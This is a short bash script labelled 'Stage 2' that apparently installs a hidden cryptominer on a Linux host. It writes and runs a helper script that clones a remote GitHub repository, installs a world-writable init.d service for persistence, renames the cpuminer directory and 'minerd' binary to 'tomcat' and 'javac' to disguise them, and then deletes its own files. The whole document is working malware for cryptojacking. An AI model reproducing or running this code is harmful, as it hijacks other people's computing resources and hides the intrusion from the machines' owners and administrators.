## Stage 2 ##
#!/bin/bash
echo "rm -f /root/1" > /root/2;
echo "cd /root/" >> /root/2;
echo "git clone https://github.com/stryng/bash-stuff.git" >> /root/2;
echo "cp /root/bash-stuff/1 /etc/init.d/1" >> /root/2;
echo "chmod 777 /etc/init.d/1" >> /root/2;
echo "update-rc.d 1 defaults" >> /root/2;
echo "rm -rf /root/bash-stuff" >> /root/2;
echo "mv /opt/cpuminer-multi/ /opt/tomcat" >> /root/2;
echo "mv /opt/tomcat/minerd /opt/tomcat/javac" >> /root/2;
echo "service 1 restart || /etc/init.d/1 start" >> /root/2;
chmod 777 /root/2 && /root/2;
rm -f /root/1 && rm -f /root/2;
